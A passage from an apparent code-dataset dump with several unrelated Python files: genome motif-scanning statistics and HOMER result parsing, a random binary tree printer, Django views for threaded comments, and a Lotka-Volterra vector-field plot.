Compute p-values\n p_vals = 1 - motif_score_distribution.cdf(motif_scores)\n print('\\tDone.')\n\n # threshold by p-value\n if p_val_threshold is not None:\n initial_hit_size = len(motif_scores)\n print('Discarding hits with p-values greater than {} ...'.format(p_val_threshold))\n p_val_mask = p_vals < p_val_threshold\n p_vals = p_vals[p_val_mask]\n motif_scores = motif_scores[p_val_mask]\n contig_ids = contig_ids[p_val_mask]\n start_locations = start_locations[p_val_mask]\n strands = strands[p_val_mask]\n print('\\t{} out of {} hits passed p-value cutoff'.format(len(p_vals), initial_hit_size)) \n \n print('Applying multiple testing correction ...')\n pass_fail, q_vals, dummy, dummy = statsmodels.sandbox.stats.multicomp.multipletests(p_vals, alpha=fdr, method='fdr_bh')\n\n print('\\tFound {} hits at an FDR of {}'.format(pass_fail.sum(), fdr))\n \n print('Constructing output ...')\n q_vals = q_vals[pass_fail]\n length_cutoff = len(q_vals)\n \n # Do final sorting and thresholding.\n sort_index = numpy.argsort(motif_scores)[::-1]\n motif_scores = motif_scores[sort_index][:length_cutoff]\n contig_ids = contig_ids[sort_index][:length_cutoff]\n start_locations = start_locations[sort_index][:length_cutoff]\n strands = strands[sort_index][:length_cutoff]\n p_vals = p_vals[sort_index][:length_cutoff]\n \n strand_translate = {True:'+', False:'-'}\n\n output_regions = pandas.DataFrame({'contig':[contig_names[contig_num] for contig_num in contig_ids],\n 'start': start_locations,\n 'end': start_locations + pwm.shape[1],\n 'strand': [strand_translate[strand] for strand in strands],\n 'motif_lr_score': motif_scores,\n 'p_value': p_vals,\n 'q_value': q_vals,\n })[['contig', 'start','end', 'strand', 'motif_lr_score', 'p_value', 'q_value']]\n \n print('All done in {}'.format(datetime.datetime.now() - start_time))\n return output_regions\n \n\ndef find_motifs(sequence_dictionary, pwm, llr_threshold=0, fdr=0.05, p_val_threshold=None, polish_partition=True, initial_search_fraction=1e-7, mem_map=False):\n \"\"\"\n Models the motif score distribution as a mixture of signal component defined by a PWM\n and a gaussian noise component.\n \"\"\"\n # ToDo: Add KS test sanity check for agreement of background scores to background distribution.\n \n start_time = datetime.datetime.now()\n motif_width = pwm.shape[1]\n \n # number the contigs\n contig_names = {contig_number:contig_name for contig_number, contig_name in enumerate(sorted(sequence_dictionary))}\n contig_numbers = {contig_name:contig_number for contig_number, contig_name in enumerate(sorted(sequence_dictionary))}\n contig_lengths = {contig_name:len(sequence_dictionary[contig_name]) for contig_name in sequence_dictionary}\n genome_size = sum([len(sequence_dictionary[contig_name]) for contig_name in sequence_dictionary])\n\n rev_pwm = motif_rev_complement(pwm) # compute the reverse complement of the motif\n\n # build genome wide arrays: contig identity, motif score, and start location\n contig_ids_by_contig = []\n motif_scores_by_contig = []\n start_locations_by_contig = []\n strands_by_contig = []\n print('Scoring genome sequence ...')\n for contig_name in toolbox.numerical_string_sort(sequence_dictionary):\n contig_length = len(sequence_dictionary[contig_name])\n print('\\tScoring contig {} ...'.format(contig_name))\n for strand in (True, False): \n contig_ids_by_contig.append(numpy.full(shape=contig_length, fill_value=contig_numbers[contig_name], dtype=numpy.int16)[:-(motif_width -1)])\n motif_scores_by_contig.append(scan_pwm(sequence_dictionary[contig_name], (rev_pwm, pwm)[strand], at_motif_midpoint=False)[:-(motif_width -1)])\n start_locations_by_contig.append(numpy.arange(contig_length).astype(numpy.int32)[:-(motif_width -1)])\n strands_by_contig.append(numpy.full(shape=contig_length, fill_value=strand, dtype=numpy.bool)[:-(motif_width -1)])\n\n del(sequence_dictionary)\n \n print('Concatenating chromosomes ...')\n contig_ids = numpy.concatenate(contig_ids_by_contig)\n del(contig_ids_by_contig)\n motif_scores = numpy.concatenate(motif_scores_by_contig)\n del(motif_scores_by_contig)\n start_locations = numpy.concatenate(start_locations_by_contig)\n del(start_locations_by_contig)\n strands = numpy.concatenate(strands_by_contig)\n del(strands_by_contig)\n\n # remove any loci with NaN scores\n print('Filtering out invalid loci ...')\n nonnan_loci = numpy.nonzero(~numpy.isnan(motif_scores))[0]\n contig_ids = contig_ids[nonnan_loci]\n motif_scores = motif_scores[nonnan_loci]\n start_locations = start_locations[nonnan_loci]\n strands = strands[nonnan_loci]\n print('\\tRemoved {} out of {} loci'.format((genome_size*2) - len(nonnan_loci), (genome_size*2)))\n del(nonnan_loci)\n\n print('Prioritizing ...')\n sort_index = numpy.argsort(motif_scores)[::-1]\n motif_scores = motif_scores[sort_index]\n contig_ids = contig_ids[sort_index]\n start_locations = start_locations[sort_index]\n strands = strands[sort_index]\n del(sort_index)\n \n if mem_map:\n print('Mem mapping ...')\n motif_scores = toolbox.replace_with_mem_map(motif_scores, tmp_dir=TMP_DIR)\n contig_ids = toolbox.replace_with_mem_map(contig_ids, tmp_dir=TMP_DIR)\n start_locations = toolbox.replace_with_mem_map(start_locations, tmp_dir=TMP_DIR)\n strands = toolbox.replace_with_mem_map(strands, tmp_dir=TMP_DIR)\n \n\n print('Computing initial partition ...')\n background_mean = motif_scores.mean()\n background_std = motif_scores.std()\n print('\\tInitial background N({}, {})'.format(background_mean, background_std))\n length_cutoff = numpy.argmin(numpy.abs(motif_scores - numpy.log2(toolbox.my_normal_pdf(motif_scores,\n mean=background_mean,\n sigma=background_std))))\n\n print('\\tEstimated {} true motifs.'.format(length_cutoff))\n \n if polish_partition:\n def obj_func(params):\n cutoff = int(params)\n\n background_scores = motif_scores[cutoff:]\n background_mean = background_scores.mean()\n background_std = background_scores.std()\n ll_background = numpy.log2(toolbox.my_normal_pdf(background_scores, mean=background_mean, sigma=background_std)).sum()\n \n true_scores = motif_scores[:cutoff]\n ll_true = true_scores.sum()\n \n ll_total = ll_background + ll_true\n\n print('\\tcutoff {}; background N({}, {})'.format(cutoff, background_mean, background_std))\n print('\\tll bkg=bkg {:>0.2}, true=true {:>0.2}, total {:>0.2}'.format(ll_background, ll_true, ll_total))\n\n return -ll_total\n \n initial_right_bound = length_cutoff + int(len(motif_scores) * initial_search_fraction)\n \n print('Searching for maximum likelihood partition from {} to {} ...'.format(length_cutoff, initial_right_bound))\n length_cutoff = toolbox.binary_int_min(obj_func, bounds=(length_cutoff, initial_right_bound))\n if length_cutoff == initial_right_bound: # the true minimum may be past our cutoff\n print('Initial search failed! Extending search to whole genome ...')\n length_cutoff = toolbox.binary_int_min(obj_func, bounds=(length_cutoff, len(motif_scores)))\n\n print('Found {} likely true motifs'.format(length_cutoff))\n true_scores = motif_scores[:length_cutoff]\n background_scores = motif_scores[length_cutoff:]\n \n print('Fitting normal distribution to background scores ...')\n data_size = len(motif_scores)\n background_mean, background_std = background_scores.mean(), background_scores.std() \n background_score_distribution = scipy.stats.norm(loc=background_mean, scale=background_std)\n del(background_scores)\n print('\\tBackground scores have mean {:>0.2}, SD {:>0.2}'.format(background_mean, background_std))\n\n print('Computing final log-likelihood ratios ...')\n llr = motif_scores - numpy.log2(toolbox.my_normal_pdf(motif_scores, mean=background_mean, sigma=background_std))\n \n if llr_threshold is not None:\n print('Finding motif hits with log-likelihood ratios greater than {} ...'.format(llr_threshold))\n llr_mask = llr > llr_threshold\n motif_scores = motif_scores[llr_mask]\n contig_ids = contig_ids[llr_mask]\n start_locations = start_locations[llr_mask]\n strands = strands[llr_mask]\n del(llr_mask)\n print('\\tKept {} motif hits.'.format(len(motif_scores)))\n \n print('Computing p-values ...')\n # Compute p-values\n p_vals = 1 - background_score_distribution.cdf(motif_scores)\n print('\\tDone.')\n\n # threshold by p-value\n if p_val_threshold is not None:\n initial_hit_size = len(motif_scores)\n print('Discarding hits with p-values greater than {} ...'.format(p_val_threshold))\n p_val_mask = p_vals < p_val_threshold\n p_vals = p_vals[p_val_mask]\n motif_scores = motif_scores[p_val_mask]\n contig_ids = contig_ids[p_val_mask]\n start_locations = start_locations[p_val_mask]\n llr = llr[p_val_mask]\n strands = strands[p_val_mask]\n del(p_val_mask)\n print('\\t{} out of {} hits passed p-value cutoff'.format(len(p_vals), initial_hit_size)) \n \n print('Applying multiple testing correction ...')\n pass_fail, q_vals, dummy, dummy = statsmodels.sandbox.stats.multicomp.multipletests(p_vals, alpha=fdr, method='fdr_bh')\n\n print('\\tFound {} hits at an FDR of {}'.format(pass_fail.sum(), fdr))\n \n print('Constructing output ...')\n q_vals = q_vals[pass_fail]\n length_cutoff = len(q_vals)\n \n # Do final thresholding.\n motif_scores = motif_scores[:length_cutoff]\n contig_ids = contig_ids[:length_cutoff]\n start_locations = start_locations[:length_cutoff]\n strands = strands[:length_cutoff]\n p_vals = p_vals[:length_cutoff]\n llr = llr[:length_cutoff]\n \n strand_translate = {True:'+', False:'-'}\n\n output_regions = pandas.DataFrame({'contig':[contig_names[contig_num] for contig_num in contig_ids],\n 'start': start_locations,\n 'end': start_locations + pwm.shape[1],\n 'strand': [strand_translate[strand] for strand in strands],\n 'motif_score': motif_scores,\n 'empirical_llr': llr,\n 'p_value': p_vals,\n 'q_value': q_vals,\n })[['contig', 'start','end', 'strand', 'motif_score', 'empirical_llr','p_value', 'q_value']]\n \n print('All done in {}'.format(datetime.datetime.now() - start_time))\n return output_regions\n\n \ndef emit_sequences(linear_probabilities, size=1, random_seed=None, alphabet=('A', 'C', 'G','T')):\n \"\"\"\n Given a matrix of probabilities for each nucleotide by position, returns\n a list of sequences (as lists of characters) randomly drawn from :param:`alphabet`\n using :param:`random_seed`\n \"\"\"\n numpy.random.seed(random_seed)\n return [[numpy.random.choice(alphabet, p=linear_probabilities[:,col_number]) for col_number in range(linear_probabilities.shape[1])] for i in range(size)]\n\n\ndef count_aligned_motifs(motif_sequence_list):\n \"\"\"\n Given a list of aligned sequences (as strings), return a DataFrame of counts for each observed\n character by position.\n \"\"\"\n motif_counts = collections.defaultdict(lambda: collections.defaultdict(lambda: 0))\n for motif_sequence in motif_sequence_list:\n for char_pos, char in enumerate(motif_sequence):\n motif_counts[char_pos][char] += 1\n return (pandas.DataFrame(motif_counts).sort_index(axis=0)).fillna(value=0)\n \n\nclass HomerMotifEnrichment():\n def __init__(self, homer_output_directory):\n \"\"\"\n Class that wraps the html output of HOMER's motif enrichment analyses.\n \"\"\"\n self.homer_output_directory = homer_output_directory\n print('Initializing data wrapper for HOMER motif enrichment analyses in {}'.format(homer_output_directory))\n \n self.known_motif_table = None\n self.denovo_motif_table = None\n \n known_motif_fname = os.path.join(self.homer_output_directory, 'knownResults.html')\n denovo_motif_fname = os.path.join(self.homer_output_directory, 'homerResults.html')\n \n if os.path.isfile(known_motif_fname):\n print('Found known motif enrichments. Loading ...')\n self.known_motif_table = self._known_motifs_to_df(self._parse_known_motifs(known_motif_fname))\n \n if os.path.isfile(denovo_motif_fname):\n print('Found de novo motif enrichments. Loading ...')\n self.denovo_motif_table = self._denovo_motifs_to_df(self._parse_denovo_motifs(denovo_motif_fname))\n self.denovo_pfms = self._load_denovo_pfms(os.path.join(self.homer_output_directory, 'homerResults'), range(self.denovo_motif_table.shape[0]))\n\n def _parse_known_motifs(self, known_motif_file_name):\n table_data = {}\n # known_motif_file_name = os.path.join(motif_dir, 'knownResults.html')\n\n with open(known_motif_file_name, 'rt') as html_file:\n known_motifs = bs4.BeautifulSoup(html_file.read(), 'html.parser')\n\n table_body = known_motifs.table\n table_rows = table_body.find_all('tr')\n header_row = table_rows[0]\n col_headers = [ele.contents[0].encode() for ele in header_row.find_all('td')]\n for rank, row in enumerate(table_rows[1:]):\n new_row_data = {}\n for field_name, field_value in zip(col_headers, row.find_all('td')):\n field_name = field_name.decode()\n if field_value.findChildren():\n if field_name == 'Motif':\n # new_row_data['Motif'] = field_value.findChildren()[0].attrs['src'] # used to store the filename of the PNG in older HOMER versions. Now obsolete.\n new_row_data['Motif'] = field_value # for now we just store the SVG markup until we figure out what to do with it.\n else:\n new_value = field_value.contents[0].strip()\n if field_name == 'Name':\n new_value = new_value.split('/')[0]\n new_row_data[field_name] = toolbox.smart_convert(new_value)\n\n table_data[rank] = new_row_data\n return table_data\n\n def _known_motifs_to_df(self, motif_data_dict):\n COL_ORDER = ['Name',\n 'P-value',\n 'q-value (Benjamini)',\n '% of Targets Sequences with Motif',\n '% of Background Sequences with Motif',\n '# Target Sequences with Motif',\n '# Background Sequences with Motif'\n ]\n motif_df = pandas.DataFrame(motif_data_dict).T\n motif_df = motif_df.loc[:, COL_ORDER]\n return motif_df\n\n def _parse_denovo_motifs(self, de_novo_motif_file_name):\n\n table_data = {}\n\n with open(de_novo_motif_file_name, 'rt') as html_file:\n known_motifs = bs4.BeautifulSoup(html_file.read(), 'html.parser')\n\n table_body = known_motifs.table\n table_rows = table_body.find_all('tr')\n header_row = table_rows[0]\n col_headers = [ele.contents[0].encode() for ele in header_row.find_all('td')]\n # print col_headers\n for rank, row in enumerate(table_rows[1:]):\n new_row_data = {}\n for field_name, field_value in zip(col_headers, row.find_all('td')):\n field_name = field_name.decode()\n if field_value.findChildren():\n if field_name == 'Motif':\n # new_row_data['Motif'] = field_value.findChildren()[0].attrs['src'] # used to store the filename of the PNG in older HOMER versions. Now obsolete.\n new_row_data['Motif'] = field_value # for now we just store the SVG markup until we figure out what to do with it.\n\n elif field_name == 'Best Match/Details':\n best_match_text = field_value.get_text()\n matching_motif_name = best_match_text.split('/')[0]\n similarity = float(best_match_text.split('/')[-1].split('(')[-1].split(')')[0])\n new_row_data['Best Match'] = matching_motif_name\n new_row_data['Similarity'] = similarity\n else: \n new_value = field_value.contents[0].strip() \n new_row_data[field_name] = toolbox.smart_convert(new_value)\n\n table_data[rank] = new_row_data\n\n return table_data\n\n def _denovo_motifs_to_df(self, motif_data_dict):\n COL_ORDER = ['Best Match',\n 'Similarity',\n 'P-value',\n '% of Targets',\n '% of Background',\n 'STD(Bg STD)'\n # 'Best Match/Details'\n ]\n motif_df = pandas.DataFrame(motif_data_dict).T\n motif_df = motif_df.loc[:, COL_ORDER]\n return motif_df\n \n def _load_denovo_pfms(self, motif_directory, motif_numbers):\n print('Loading PFMs for de novo motifs ...')\n pfm_dict = {}\n for motif_num in motif_numbers:\n motif_fname = os.path.join(motif_directory, 'motif{}.motif'.format(motif_num+1))\n \n pfm_dict[motif_num] = list(load_PFM_vertical(motif_fname, data_type='frequencies').values())[0]\n return pfm_dict\n \n \ndef parse_motif_name(motif_name):\n \"\"\"\n Given a motif data header from HOMER, return a tuple consisting of the trimmed motif name, the motif class, and the LLR threshold\n \"\"\"\n partial_name = motif_name.split('\\t')[1].split('/')[0]\n motif_class = partial_name.split('(')[1].split(')')[0]\n trimmed_name = partial_name.split('(')[0]\n threshold = float(motif_name.split('\\t')[2])\n return trimmed_name, motif_class, threshold ","sub_path":"pgtools/motiftools.py","file_name":"motiftools.py","file_ext":"py","file_size_in_byte":39566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483856418","text":"\n# Binary tree defintion\nimport random\nNODE_PRINT_SIZE = 6\n\nclass Node:\n def __init__(self, val):\n self.left = None\n self.right = None\n self.val = val\n print(val)\n\n def __init__(self,val, left = None ,right = None):\n self.left = left\n self.right = right\n self.val = val\n\ndef createRandomBinaryTree(level):\n # numberOfNode = pow(2,size) - 1\n # print(numberOfNode)\n tree = generateTree(level)\n return tree\n\ndef printBinaryTree(node):\n if node:\n print(node.val)\n printBinaryTree(node.left)\n printBinaryTree(node.right)\n\ndef generateTree(level):\n if(level < 0):\n return None\n n = Node(random.randint(0,99))\n n.right = generateTree(level-1)\n n.left = generateTree(level-1)\n # print(n.val)\n return n\n\ndef generateOffset(length):\n text = \"\"\n offsetLength = int((length) * NODE_PRINT_SIZE)\n for i in range(0,offsetLength):\n text +=\" \"\n return text\n\ndef prettyPrintBT(node,offset):\n if node:\n prettyPrintBT(node.right,offset+1)\n pNode = \"----[{0}]\".format(node.val)\n print(generateOffset(offset)+pNode)\n print(generateOffset(offset)+\"|\")\n prettyPrintBT(node.left,offset+1)\n\n","sub_path":"python/src/binarytree/BT.py","file_name":"BT.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"208792581","text":"import textwrap\nimport datetime\n\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.template.response import TemplateResponse\nfrom django.http import Http404, HttpResponse, HttpResponseNotAllowed\nfrom django.template import RequestContext\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils.html import escape\nfrom django.utils import datastructures, simplejson\n\nfrom django.contrib.comments.views.utils import next_redirect\nfrom django.contrib.comments.views.comments import CommentPostBadRequest\nfrom django.contrib.comments import signals, get_form, get_model\n\nfrom mptt_comments.decorators import login_required_ajax\n\ndef _lookup_content_object(data):\n # Look up the object we're trying to comment about\n ctype = data.get(\"content_type\")\n object_pk = data.get(\"object_pk\")\n parent_pk = data.get(\"parent_pk\")\n \n if parent_pk:\n try:\n parent_comment = get_model().objects.get(pk=parent_pk)\n target = parent_comment.content_object\n model = target.__class__\n except get_model().DoesNotExist:\n return CommentPostBadRequest(\n \"Parent comment with PK %r does not exist.\" % \\\n escape(parent_pk))\n elif ctype and object_pk:\n try:\n parent_comment = None\n model = models.get_model(*ctype.split(\".\", 1))\n target = model._default_manager.get(pk=object_pk)\n except TypeError:\n return CommentPostBadRequest(\n \"Invalid content_type value: %r\" % escape(ctype))\n except AttributeError:\n return CommentPostBadRequest(\n \"The given content-type %r does not resolve to a valid model.\" % \\\n escape(ctype))\n except ObjectDoesNotExist:\n return CommentPostBadRequest(\n \"No object matching content-type %r and object PK %r exists.\" % \\\n (escape(ctype), escape(object_pk)))\n else:\n return CommentPostBadRequest(\"Missing content_type or object_pk field.\")\n\n return (target, parent_comment, model)\n\n@login_required_ajax\ndef new_comment(request, parent_pk=None, content_type=None, object_pk=None, *args, **kwargs):\n \"\"\"\n Display the form used to post a reply. \n \n Expects a comment_id, and an optionnal 'is_ajax' parameter in request.GET.\n \"\"\"\n \n is_ajax = request.GET.get('is_ajax') and '_ajax' or ''\n data = {\n 'parent_pk': parent_pk, \n 'content_type': content_type,\n 'object_pk': object_pk,\n }\n response = _lookup_content_object(data)\n if isinstance(response, HttpResponse):\n return response\n else:\n target, parent_comment, model = response\n \n # Construct the initial comment form\n form = get_form()(target, parent_comment=parent_comment)\n \n template_list = [\n \"comments/%s_%s_new_form%s.html\" % tuple(str(model._meta).split(\".\") + [is_ajax]),\n \"comments/%s_new_form%s.html\" % (model._meta.app_label, is_ajax),\n \"comments/new_form%s.html\" % is_ajax,\n ]\n return TemplateResponse(request, template_list, { \"form\" : form })\n\n@login_required_ajax\n@login_required\ndef post_comment(request, next=None, *args, **kwargs):\n \"\"\"\n Post a comment.\n\n HTTP POST is required unless a initial form is requested. If ``POST['submit'] == \"preview\"`` or if there are\n errors a preview template, ``comments/preview.html``, will be rendered.\n \"\"\"\n\n # Require POST\n if request.method != 'POST':\n return HttpResponseNotAllowed([\"POST\"])\n \n is_ajax = request.POST.get('is_ajax') and '_ajax' or ''\n\n # Fill out some initial data fields from an authenticated user, if present\n data = request.POST.copy()\n\n if request.user.is_authenticated():\n if not data.get('name', ''):\n data[\"name\"] = request.user.get_full_name()\n if not data.get('email', ''):\n data[\"email\"] = request.user.email\n\n response = _lookup_content_object(data)\n if isinstance(response, HttpResponse):\n return response\n else:\n target, parent_comment, model = response\n\n # Do we want to preview the comment?\n preview = data.get(\"submit\", \"\").lower() == \"preview\" or \\\n data.get(\"preview\", None) is not None\n \n # Construct the comment form \n form = get_form()(target, parent_comment=parent_comment, data=data)\n \n # Check security information\n if form.security_errors():\n return CommentPostBadRequest(\n \"The comment form failed security verification: %s\" % \\\n escape(str(form.security_errors())))\n\n # If there are errors or if we requested a preview show the comment\n if form.errors or preview:\n template_list = [\n \"comments/%s_%s_preview%s.html\" % tuple(str(model._meta).split(\".\") + [is_ajax]),\n \"comments/%s_preview%s.html\" % (model._meta.app_label, is_ajax),\n \"comments/preview%s.html\" % is_ajax\n ]\n data = {\n 'comment': form.data.get(\"comment\", \"\"),\n 'parent': parent_comment,\n 'level': parent_comment and parent_comment.level + 1 or 0,\n 'title': form.data.get(\"title\", \"\"),\n 'submit_date': datetime.datetime.now(),\n 'rght': 0,\n 'lft': 0,\n 'user': request.user,\n 'user_name' : request.user.username,\n }\n comment = get_model()(**data)\n return TemplateResponse(request, template_list, {\n \"comment\" : comment,\n \"preview\" : True,\n \"form\" : form,\n \"allow_post\": not form.errors,\n \"is_ajax\" : is_ajax,\n })\n\n # Otherwise create the comment\n comment = form.get_comment_object()\n comment.ip_address = request.META.get(\"REMOTE_ADDR\", None)\n comment.user = request.user\n comment.user_name = request.user.username\n\n # Signal that the comment is about to be saved\n responses = signals.comment_will_be_posted.send(\n sender = comment.__class__,\n comment = comment,\n request = request\n )\n\n for (receiver, response) in responses:\n if response == False:\n return CommentPostBadRequest(\n \"comment_will_be_posted receiver %r killed the comment\" % receiver.__name__)\n\n # Save the comment and signal that it was saved\n comment.save()\n signals.comment_was_posted.send(\n sender = comment.__class__,\n comment = comment,\n request = request\n )\n \n return next_redirect(request, next, 'comments-comment-done%s' % (is_ajax and '-ajax' or ''), c=comment._get_pk_val())\n \ndef confirmation_view(template, doc=\"Display a confirmation view.\", is_ajax=False, *args, **kwargs):\n \"\"\"\n Confirmation view generator for the \"comment was\n posted/flagged/deleted/approved\" views.\n \n The HTTP Status code will be different depending on the comment used:\n - 201 Created for a is_public=True comment\n - 202 Accepted for a is_public=False comment\n \"\"\"\n def confirmed(request):\n comment = None\n if 'c' in request.GET:\n try:\n comment = get_model().objects.get(pk=request.GET['c'])\n except ObjectDoesNotExist:\n pass\n\n response = TemplateResponse(request, template, {\n 'comment': comment,\n 'is_ajax': is_ajax,\n 'success' : True\n })\n response.status_code = comment.is_public and 201 or 202\n return response\n\n confirmed.__doc__ = textwrap.dedent(\"\"\"\\\n %s\n\n Templates: `%s``\n Context:\n comment\n The posted comment\n \"\"\" % (doc, template)\n )\n return confirmed\n \ncomment_done_ajax = confirmation_view(\n template = \"comments/posted_ajax.html\",\n doc = \"\"\"Display a \"comment was posted\" success page.\"\"\",\n is_ajax = True,\n)\n\ncomment_done = confirmation_view(\n template = \"comments/posted.html\",\n doc = \"\"\"Display a \"comment was posted\" success page.\"\"\"\n)\n \ndef comment_tree_json(request, object_list, tree_id, cutoff_level, bottom_level):\n \n if object_list:\n json_comments = {'end_level': object_list[-1].level, 'end_pk': object_list[-1].pk}\n \n template_list = [\n \"comments/display_comments_tree.html\",\n ]\n json_comments['html'] = render_to_string(\n template_list, {\n \"comments\" : object_list,\n \"cutoff_level\": cutoff_level,\n \"bottom_level\": bottom_level,\n \"is_ajax\" : True,\n }, \n RequestContext(request, {})\n )\n \n return json_comments\n return {}\n\ndef comments_more(request, from_comment_pk, restrict_to_tree=False, *args, **kwargs):\n\n comment = get_model().objects.select_related('content_type').get(pk=from_comment_pk)\n\n offset = getattr(settings, 'MPTT_COMMENTS_OFFSET', 20)\n collapse_above = getattr(settings, 'MPTT_COMMENTS_COLLAPSE_ABOVE', 2)\n cutoff_level = getattr(settings, 'MPTT_COMMENTS_CUTOFF', 3)\n bottom_level = 0\n \n qs = get_model().objects.filter_hidden_comments().filter(\n content_type=comment.content_type,\n object_pk=comment.object_pk,\n level__lte=cutoff_level\n )\n \n part1 = Q(tree_id=comment.tree_id) & Q(lft__gte=comment.lft + 1)\n if restrict_to_tree:\n # Here we only want the nodes with the same root-id and a greater lft value. \n qs = qs.filter(part1)\n bottom_level = comment.level + 1\n else:\n # Here we need all nodes with a different root-id, or all nodes with\n # the same root-id and a greater lft value. \n # The default order should do the right thing\n # \n # FIXME: it expects tree_id to be in chronological order!\n part2 = Q(tree_id__gt=comment.tree_id)\n qs = qs.filter(part1 | part2)\n \n until_toplevel = []\n remaining = []\n toplevel_reached = False\n remaining_count = qs.count() - offset\n \n for comment in qs[:offset]:\n \n if comment.level == 0:\n toplevel_reached = True\n \n if toplevel_reached:\n remaining.append(comment)\n else:\n until_toplevel.append(comment)\n \n json_data = {'remaining_count': remaining_count, 'comments_for_update': [], 'comments_tree': {} }\n if restrict_to_tree:\n json_data['tid'] = comment.get_root().id\n else:\n json_data['tid'] = 0\n \n for comment in until_toplevel: \n json_comment = {'level': comment.level, 'pk': comment.pk, 'parent' : comment.parent_id}\n template_list = [\n \"comments/display_comment.html\",\n ]\n json_comment['html'] = render_to_string(\n template_list, {\n \"comment\" : comment,\n \"cutoff_level\": cutoff_level,\n \"collapse_levels_above\": collapse_above,\n \"is_ajax\" : True,\n }, \n RequestContext(request, {})\n )\n json_data['comments_for_update'].append(json_comment)\n \n json_data['comments_tree'] = comment_tree_json(request, remaining, comment.tree_id, cutoff_level, bottom_level)\n \n return HttpResponse(simplejson.dumps(json_data), mimetype='application/json')\n \ndef comments_fulltree(request, tree_id, *args, **kwargs):\n try:\n comments = get_model().objects.filter_hidden_comments().filter(tree_id=tree_id)\n comment = comments[0]\n except IndexError:\n raise Http404(\"No top level comment found for tree id %s\" % tree_id)\n cutoff = getattr(settings, 'MPTT_COMMENTS_FULLTREE_CUTOFF', getattr(settings, 'MPTT_COMMENTS_CUTOFF', 3)) + 1\n return comments_subtree(request, comment.pk, include_self=True, include_ancestors=True, cutoff=cutoff, *args, **kwargs)\n \ndef comments_subtree(request, from_comment_pk, include_self=None, include_ancestors=None, cutoff=None, *args, **kwargs):\n \n comment = get_model().objects.select_related('content_type').get(pk=from_comment_pk)\n \n if not cutoff:\n cutoff = getattr(settings, 'MPTT_COMMENTS_CUTOFF', 3)\n cutoff_level = comment.level + cutoff\n bottom_level = not include_ancestors and (comment.level - (include_self and 1 or 0)) or 0\n \n qs = get_model().objects.filter_hidden_comments().filter(\n tree_id=comment.tree_id, \n lft__gte=comment.lft + (not include_self and 1 or 0),\n lft__lte=comment.rght,\n level__lte=cutoff_level - (include_self and 1 or 0)\n )\n \n is_ajax = request.GET.get('is_ajax') and '_ajax' or ''\n \n if is_ajax: \n \n json_data = {'comments_for_update': [], 'comments_tree': {} }\n json_data['comments_tree'] = comment_tree_json(request, list(qs), comment.tree_id, cutoff_level, bottom_level)\n \n return HttpResponse(simplejson.dumps(json_data), mimetype='application/json')\n \n else:\n \n target = comment.content_object\n model = target.__class__\n\n template_list = [\n \"comments/%s_%s_subtree.html\" % tuple(str(model._meta).split(\".\")),\n \"comments/%s_subtree.html\" % model._meta.app_label,\n \"comments/subtree.html\"\n ]\n \n comments = list(qs)\n if include_ancestors:\n comments = list(comment.get_ancestors()) + comments\n \n return TemplateResponse(request, template_list, {\n \"object\" : target,\n \"detail_comment\" : comment,\n \"comments\" : comments,\n \"bottom_level\": bottom_level,\n \"cutoff_level\": cutoff_level - 1,\n \"collapse_levels_above\": getattr(settings, 'MPTT_COMMENTS_COLLAPSE_ABOVE', 2),\n \"collapse_levels_below\": getattr(settings, 'MPTT_COMMENTS_COLLAPSE_BELOW_DETAIL', True) and comment.level or 0\n })\n\ndef count_for_object(request, content_type_id, object_pk, mimetype='text/plain'):\n \"\"\"\n Returns the comment count for any object defined by content_type_id and object_id or slug.\n Mimetype defaults to plain text.\n \"\"\"\n try:\n ctype = ContentType.objects.get_for_id(content_type_id)\n except ObjectDoesNotExist:\n raise Http404(\"No content found for id %s\" % content_type_id)\n count = str(get_model().objects.filter(object_pk=object_pk, content_type=ctype).count())\n return HttpResponse(count, mimetype = mimetype)\n","sub_path":"mptt_comments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"111214656","text":"#!/usr/bin/env python3\nfrom plotly import tools as toolsly\nfrom plotly.offline import plot\nimport plotly.graph_objs as go\nimport numpy as np\n\n##### parameters for everything\n\nalpha = 10 # prey growth\nbeta = 1 # predator eat\ndelta = 10. # predator growth\ngamma = 1 # predator death\n\n# second fixed point\n(xfixed, yfixed) = (gamma /delta, alpha / beta)\n\n# plotting parameters\nxmax = 2. * xfixed\nymax = 2. * yfixed\nnumarrows = 20.\n\n# grid for everything\nx,y = np.meshgrid(np.arange(0, xmax, xmax/numarrows), np.arange(0, ymax, ymax/numarrows))\n\n# vector of arrows\nu = alpha * x - beta * x * y\nv = delta * x * y - gamma * y\n\n####################\n\ntitle = 'alpha=%.1f beta=%.1f delta=%.1f gamma=%.1f' % (alpha, beta, delta, gamma)\next = '_'.join([str(item) for item in [alpha, beta, delta, gamma]])\nfilename='quiverplot_'+ext+'.html'\n\nhtmlline = ''.join([str(item) for item in [alpha, beta, delta, gamma]])\nhtmlline = '' + htmlline + 'link'\nprint(htmlline)\n\n# fixed points\npoints = go.Scatter(x=[0, xfixed], y=[0, yfixed],\n mode='markers',\n marker=dict(size=12),\n name='fixed points',)\n\noptions = {}\nif len(ext) <= 0:\n options['visible'] = 'legendonly'\n\n\nfig = toolsly.FigureFactory.create_quiver(x, y, u, v,\n scale=.01, arrow_scale=.1,\n name='density', **options)\n\nfig['data'].append(points)\nfig['layout']['xaxis'] = dict(range=[0., xmax])\nfig['layout']['yaxis'] = dict(range=[0., ymax])\nfig['layout']['title'] = title\nplot(fig, show_link=False, filename='lotka_volterra/'+ filename)\n\n# http://tributary.io/inlet/5211034\n","sub_path":"docs/lotka_volterra/quiver.py","file_name":"quiver.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"297270339","text":"import sys\r\n\r\narglist = sys.argv\r\n\r\nfile1 = arglist[1]\r\nfile2 = arglist[2]\r\noutput = arglist[3]\r\n\r\n\r\n# Write list to file, every item on a new line\r\ndef writefile(file, input):\r\n\toutfile = open(file, \"w\")\r\n\tprint >> 